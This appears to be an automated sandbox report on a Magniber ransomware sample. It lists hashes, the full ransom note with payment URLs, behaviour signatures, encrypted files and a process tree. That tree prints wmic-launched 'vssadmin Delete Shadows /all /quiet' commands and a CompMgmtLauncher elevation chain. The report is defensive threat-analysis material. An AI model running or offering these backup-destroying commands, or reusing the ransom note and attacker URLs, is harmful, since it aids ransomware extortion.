Overview

overview

10

Static

static

2.exe

windows7_x64

10

2.exe

windows10_x64

10

Analysis

  • max time kernel
    99s
  • max time network
    160s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    22-06-2021 14:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2.exe

  • Size

    21KB

  • MD5

    2953b6ec692537f8eace1077081f9e43

  • SHA1

    6db28862c0dbb589b918f812ff61cfdac0248eab

  • SHA256

    2cf60c433df3dcc84b80e18c93e578bf18b31c5c49777953702c53166275796b

  • SHA512

    11959d3841c3824e5d4c68771f67db6227423d99f5beb6559c165081b6300fb3553633ce871157bd972845730fcc9e1201c10507f114d7458b3940c8cdf0ca85

Score
10/10
magniberransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://7478f2f8eed008e0ekmxfykjdz.5s4ixqul2enwxrqv.onion/kmxfykjdz Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://7478f2f8eed008e0ekmxfykjdz.bestep.cyou/kmxfykjdz http://7478f2f8eed008e0ekmxfykjdz.plughas.casa/kmxfykjdz http://7478f2f8eed008e0ekmxfykjdz.ownhits.space/kmxfykjdz http://7478f2f8eed008e0ekmxfykjdz.dayhit.xyz/kmxfykjdz Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://7478f2f8eed008e0ekmxfykjdz.5s4ixqul2enwxrqv.onion/kmxfykjdz

http://7478f2f8eed008e0ekmxfykjdz.bestep.cyou/kmxfykjdz

http://7478f2f8eed008e0ekmxfykjdz.plughas.casa/kmxfykjdz

http://7478f2f8eed008e0ekmxfykjdz.ownhits.space/kmxfykjdz

http://7478f2f8eed008e0ekmxfykjdz.dayhit.xyz/kmxfykjdz

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

    ransomwaremagniber
  • Process spawned unexpected child process 10 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 5 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
    adwarespyware
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1208
    • C:\Users\Admin\AppData\Local\Temp\2.exe
      "C:\Users\Admin\AppData\Local\Temp\2.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:916
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2016
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
            PID:1388
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1288
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            4⤵
              PID:472
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1968
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1728
      • C:\Windows\system32\Dwm.exe
        "C:\Windows\system32\Dwm.exe"
        1⤵
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1180
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:608
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1616
      • C:\Windows\system32\taskhost.exe
        "taskhost.exe"
        1⤵
        • Modifies extensions of user files
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:1124
        • C:\Windows\system32\notepad.exe
          notepad.exe C:\Users\Public\readme.txt
          2⤵
          • Opens file in notepad (likely ransom note)
          PID:2024
        • C:\Windows\system32\cmd.exe
          cmd /c "start http://7478f2f8eed008e0ekmxfykjdz.bestep.cyou/kmxfykjdz^&1^&47212692^&73^&325^&12"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:568
          • C:\Program Files\Internet Explorer\iexplore.exe
            "C:\Program Files\Internet Explorer\iexplore.exe" http://7478f2f8eed008e0ekmxfykjdz.bestep.cyou/kmxfykjdz&1&47212692&73&325&12
            3⤵
            • Modifies Internet Explorer settings
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1596
            • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
              "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1596 CREDAT:275457 /prefetch:2
              4⤵
              • Modifies Internet Explorer settings
              • Suspicious use of SetWindowsHookEx
              PID:1072
        • C:\Windows\system32\cmd.exe
          cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1512
          • C:\Windows\system32\wbem\WMIC.exe
            C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
            3⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:1840
      • C:\Windows\system32\cmd.exe
        cmd /c CompMgmtLauncher.exe
        1⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:304
        • C:\Windows\system32\CompMgmtLauncher.exe
          CompMgmtLauncher.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2180
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
            3⤵
              PID:2388
        • C:\Windows\system32\cmd.exe
          cmd /c CompMgmtLauncher.exe
          1⤵
          • Process spawned unexpected child process
          • Suspicious use of WriteProcessMemory
          PID:2056
          • C:\Windows\system32\CompMgmtLauncher.exe
            CompMgmtLauncher.exe
            2⤵
              PID:2252
              • C:\Windows\system32\wbem\wmic.exe
                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                3⤵
                  PID:2456
            • C:\Windows\system32\cmd.exe
              cmd /c CompMgmtLauncher.exe
              1⤵
              • Process spawned unexpected child process
              • Suspicious use of WriteProcessMemory
              PID:2076
              • C:\Windows\system32\CompMgmtLauncher.exe
                CompMgmtLauncher.exe
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:2212
                • C:\Windows\system32\wbem\wmic.exe
                  "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                  3⤵
                    PID:2436
              • C:\Windows\system32\cmd.exe
                cmd /c CompMgmtLauncher.exe
                1⤵
                • Process spawned unexpected child process
                • Suspicious use of WriteProcessMemory
                PID:2068
                • C:\Windows\system32\CompMgmtLauncher.exe
                  CompMgmtLauncher.exe
                  2⤵
                    PID:2280
                    • C:\Windows\system32\wbem\wmic.exe
                      "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                      3⤵
                        PID:2544
                  • C:\Windows\system32\cmd.exe
                    cmd /c CompMgmtLauncher.exe
                    1⤵
                    • Process spawned unexpected child process
                    • Suspicious use of WriteProcessMemory
                    PID:792
                    • C:\Windows\system32\CompMgmtLauncher.exe
                      CompMgmtLauncher.exe
                      2⤵
                        PID:2196
                        • C:\Windows\system32\wbem\wmic.exe
                          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                          3⤵
                            PID:2484
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2708
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2700
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2732
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2772
                      • C:\Windows\system32\vssadmin.exe
                        vssadmin.exe Delete Shadows /all /quiet
                        1⤵
                        • Process spawned unexpected child process
                        • Interacts with shadow copies
                        PID:2764
                      • C:\Windows\system32\vssvc.exe
                        C:\Windows\system32\vssvc.exe
                        1⤵
                          PID:2888

                        Network

                        MITRE ATT&CK Enterprise v6

                        Replay Monitor

                        Loading Replay Monitor...

                        Downloads

                        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\4KE4OZWV.txt
                          MD5

                          d0163b836a0d255e1474cf8214fea827

                          SHA1

                          70af887b75cdf3817fde7a3f489732ea62225c63

                          SHA256

                          0cc4ebfb5acd6203bfd323d64bd7d5af2637af7b8c00cbbbc476a8b5804fdacf

                          SHA512

                          7af53b657e899cb3f8e381c729888c587469a15b7eebc08919861dce28300fff9d430a585f49345a6bfd871d9e5ca58bcd30af194904a07318ced2806302d5d0

                          Download Submit

                        • C:\Users\Admin\Desktop\ConvertToCompare.zip.kmxfykjdz
                          MD5

                          560f033b757d8868cc41ecbffab44c9a

                          SHA1

                          cbc2f926e9e2c043f0742527b9488cddca19d2de

                          SHA256

                          0a4a6f34efb2ff0d7e7d0b054e53c643552015ec43370f20f36ad583c111e3da

                          SHA512

                          9d1e1fbcad416aeef8a6728d67fe6019b62b445de322432d6fb45930c4e3fd2ff583a6a558e9380cafbda7045a217ae2f401e6cd025da924988eac6605b10a0d

                          Download Submit

                        • C:\Users\Admin\Desktop\DisableProtect.xls.kmxfykjdz
                          MD5

                          98289a4b19f4bcf1b8beda2d144dddd8

                          SHA1

                          d0b713d1cf6a10d7390b59879e130b87eaa91759

                          SHA256

                          d886582642d8f0aab9d6210550c6e8a6f2c4440903a6231b48e200229a9a361c

                          SHA512

                          3843d6aaffe08b0e1f16c750cbb93caf2b478077b291a4b11e58dbef2f992cd296fb8802f2fefdf637986ad055e4da48235d8e811eae6e8d7147acceb0dfdea1

                          Download Submit

                        • C:\Users\Admin\Desktop\ExportRedo.jpeg.kmxfykjdz
                          MD5

                          e726c8f8321c94385a6b429d72e76401

                          SHA1

                          e740d91b9d25a26b1dabde69acf029b2bb32f73a

                          SHA256

                          a5d13c3736ab246fb24b5eabbe4c5a42e51e52c28d2c424e30315d86afa8d817

                          SHA512

                          02e6778ef0f4343b322c8ffc9d10c6d5690527dd347bf85bc0687550ac6beff1d0a612cee657ed13a6b70464dc4a4271b7dfd851a0630f5a1e76781121b3b840

                          Download Submit

                        • C:\Users\Admin\Desktop\FindReceive.pdf.kmxfykjdz
                          MD5

                          34901e9aca4887faf763f4942aaab138

                          SHA1

                          0b30d2b5506956f9bae8a4a6729e694d44a8f7c5

                          SHA256

                          0aa229dc72ee0b8392721092fa1def7cef01a24d2fa803fcfc874198d3c81a95

                          SHA512

                          17a40fcfbcf7490d19f7770bb4edda52c6f5eaaeac9e87ae97a398042516e0647df0436699e311e88bf60e322cbbddd81f1e6026ef5028a01a4c64901108048f

                          Download Submit

                        • C:\Users\Admin\Desktop\HideDebug.potx.kmxfykjdz
                          MD5

                          b20b8c1e3d80d7f232013a618d83fc27

                          SHA1

                          88e1fbb70d860964cd356acb2e44a78148faddf2

                          SHA256

                          bbf1d1901cf87e317080d8805e6b13f2e731639cb5418fae4d5e12fd73600bf2

                          SHA512

                          636e90bbe87643839ca0917c22746241e68e1b232ae04bd6ad4813a0cbe18f8ff8e9d88a0f09034d35c4ec1b0d0f6be295681b01071b93b8f3f13232f1497890

                          Download Submit

                        • C:\Users\Admin\Desktop\InvokeResize.bmp.kmxfykjdz
                          MD5

                          152dc415e05a7fd73e2b2e169f954105

                          SHA1

                          96d0660a31d33e2ee1242cacd568d117152275fc

                          SHA256

                          8cae6f9eb849497faf0a2564d932a38e62179460196b1af304afd4d3f320e5b4

                          SHA512

                          8d873f698aeecbb7f73eeff2a7d766b0939836c1b05dce2f9242cae7f5644c66c7be3e70242f5fad3b3fe5c03f0c4d329fb884be5bf7728ac9c136e36e78fbe7

                          Download Submit

                        • C:\Users\Admin\Desktop\LockProtect.iso.kmxfykjdz
                          MD5

                          6f5ee9687ad09188511ef7d4f63c250a

                          SHA1

                          0c2ac12bdc5e2b3ba96897087b83afe7596bd858

                          SHA256

                          20dbe138ae7696a03c42ff204ebf62e5f7cfafab182f7679471b6d7ad9526392

                          SHA512

                          4bd9c712c6701813b3d930c61dbce9dc6644daf20eee9e4d16886b79cf2eb2ffb81cf2fd1bb908dac186174856756a8597f5fa81352bbb2708de88e20a8b4c0c

                          Download Submit

                        • C:\Users\Admin\Desktop\MergeMeasure.gif.kmxfykjdz
                          MD5

                          2488320ff228fb0c4aecbacfba867473

                          SHA1

                          c3b5e12f0008e6b12d3fdf172ba910ff03226175

                          SHA256

                          aee60fb4142a3275330cc8dbefac3cf600b53a2ad6977f7e65d32c052f784055

                          SHA512

                          f3427b5059e27c74a718bae1dcb081ec949c1bbdb599a9f67ce31e6a6ca087ef8f07b8d41ac75839eb4fb316f3967f20e18102f53c391f67936890f5c474c456

                          Download Submit

                        • C:\Users\Admin\Desktop\NewStart.mov.kmxfykjdz
                          MD5

                          de59487ace37a49218f8b48b11c10627

                          SHA1

                          bfe1c45492e26ffe21b6dfde4eb01633b8d36ee2

                          SHA256

                          11ccaa38c6b104cbd6b8e13ab6707626d10831f18ecc92c2b415cb83f98f12aa

                          SHA512

                          1c1084fe7390ff4e4c57b8675cd643c848f2f2130428c3791b9e7db06ee0e72e39098d488d5212a6347127d9109fb705903ce750fe8fecec991f7465c4593465

                          Download Submit

                        • C:\Users\Admin\Desktop\PopExit.docx.kmxfykjdz
                          MD5

                          945ff4058d44ebc62f80b0e8712a157f

                          SHA1

                          40e7dd9550aeb184ec878ee221c37aee7fdb62eb

                          SHA256

                          7b31481d03725b1b962bdc5ce3af9bcd9f3327c63ee25b6b55748ace2874a885

                          SHA512

                          d0f9abcfe9ad41277e6f6553fa8d6d1542853939b06ff803a8fb529fa65d7a5419a47d30ecca60441233898dbac2a2c3b51d57e17b4a13abd5b4c255f82dcb25

                          Download Submit

                        • C:\Users\Admin\Desktop\SwitchRestore.mov.kmxfykjdz
                          MD5

                          81534702ba13cd41d7bc88af52d83d9b

                          SHA1

                          bb1a3de23c79e35c83ed6269b555053c11ac0ef8

                          SHA256

                          215a4112b6c1d9c91f9cf192c8e00075a7784da99a071d9b7b2747ce05148698

                          SHA512

                          accc1380b2459d13c15b3ef0692f3e4622cb40c604bf1cbf9c35a0b59086589f504278af4f0630655ac35dea8f9699a5c87c222d2003f80c640c25ed152cc4d1

                          Download Submit

                        • C:\Users\Admin\Desktop\SwitchResume.vbs.kmxfykjdz
                          MD5

                          308c9fdc3806268e8a6629b93483833e

                          SHA1

                          f2902fc358eaa7b38ddff7233ed64b1086a3531a

                          SHA256

                          5be86af7b0e39fba305aec82a5af9424dfd4f17965416bbc32811384c90148ff

                          SHA512

                          2006c810cb1278413fb5da993a8bdfdcb5cd63609cb6bdb627cb75c605574a08a6ce30be531d285999d2f84f6999350d6a14dfca7dd71ab4f1f4d07beff3d92b

                          Download Submit

                        • C:\Users\Admin\Desktop\readme.txt
                          MD5

                          b47fd9f1379304f00a49ac3043a89270

                          SHA1

                          e93d9a3510c4f68d8a75ebe8abb5bc5e4f05f496

                          SHA256

                          1f2217fcae4628dfb5906f2a478c7d23a9c557b011e40c24b0ccf9e5443d378a

                          SHA512

                          9fdb5ac31a8ad02373b1fe38764d56053bea543087182f41a3b6f224200ab3e5fa599429558b214157de46400074dab71822d09f9203e974de83f29bcf0f33d7

                          Download Submit

                        • C:\Users\Public\readme.txt
                          MD5

                          b47fd9f1379304f00a49ac3043a89270

                          SHA1

                          e93d9a3510c4f68d8a75ebe8abb5bc5e4f05f496

                          SHA256

                          1f2217fcae4628dfb5906f2a478c7d23a9c557b011e40c24b0ccf9e5443d378a

                          SHA512

                          9fdb5ac31a8ad02373b1fe38764d56053bea543087182f41a3b6f224200ab3e5fa599429558b214157de46400074dab71822d09f9203e974de83f29bcf0f33d7

                          Download Submit

                        • memory/472-152-0x0000000000000000-mapping.dmp

                          Download

                        • memory/568-128-0x0000000000000000-mapping.dmp

                          Download

                        • memory/608-133-0x0000000000000000-mapping.dmp

                          Download

                        • memory/916-92-0x0000000001CB0000-0x0000000001CB1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/916-69-0x0000000000310000-0x0000000000311000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/916-63-0x0000000001DE0000-0x0000000001DE1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/916-62-0x00000000001F0000-0x00000000001F1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/916-61-0x00000000001E0000-0x00000000001E1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/916-60-0x0000000000020000-0x0000000000025000-memory.dmp

                          Filesize

                          20KB

                          Download

                        • memory/916-98-0x0000000001D10000-0x0000000001D11000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/916-94-0x0000000001CD0000-0x0000000001CD1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/916-96-0x0000000001D00000-0x0000000001D01000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/916-68-0x0000000000300000-0x0000000000301000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/916-93-0x0000000001CC0000-0x0000000001CC1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/916-67-0x0000000001DF0000-0x0000000001DF1000-memory.dmp

                          Filesize

                          4KB

                          Download

                        • memory/1072-154-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1072-155-0x0000000075011000-0x0000000075013000-memory.dmp

                          Filesize

                          8KB

                          Download

                        • memory/1124-103-0x0000000001DA0000-0x0000000001DA4000-memory.dmp

                          Filesize

                          16KB

                          Download

                        • memory/1208-64-0x0000000002AA0000-0x0000000002AB0000-memory.dmp

                          Filesize

                          64KB

                          Download

                        • memory/1288-151-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1388-153-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1512-129-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1596-132-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1616-147-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1728-149-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1840-131-0x0000000000000000-mapping.dmp

                          Download

                        • memory/1968-148-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2016-150-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2024-97-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2024-100-0x000007FEFBB51000-0x000007FEFBB53000-memory.dmp

                          Filesize

                          8KB

                          Download

                        • memory/2180-156-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2196-157-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2212-158-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2252-160-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2280-162-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2388-166-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2436-167-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2456-168-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2484-169-0x0000000000000000-mapping.dmp

                          Download

                        • memory/2544-170-0x0000000000000000-mapping.dmp

                          Download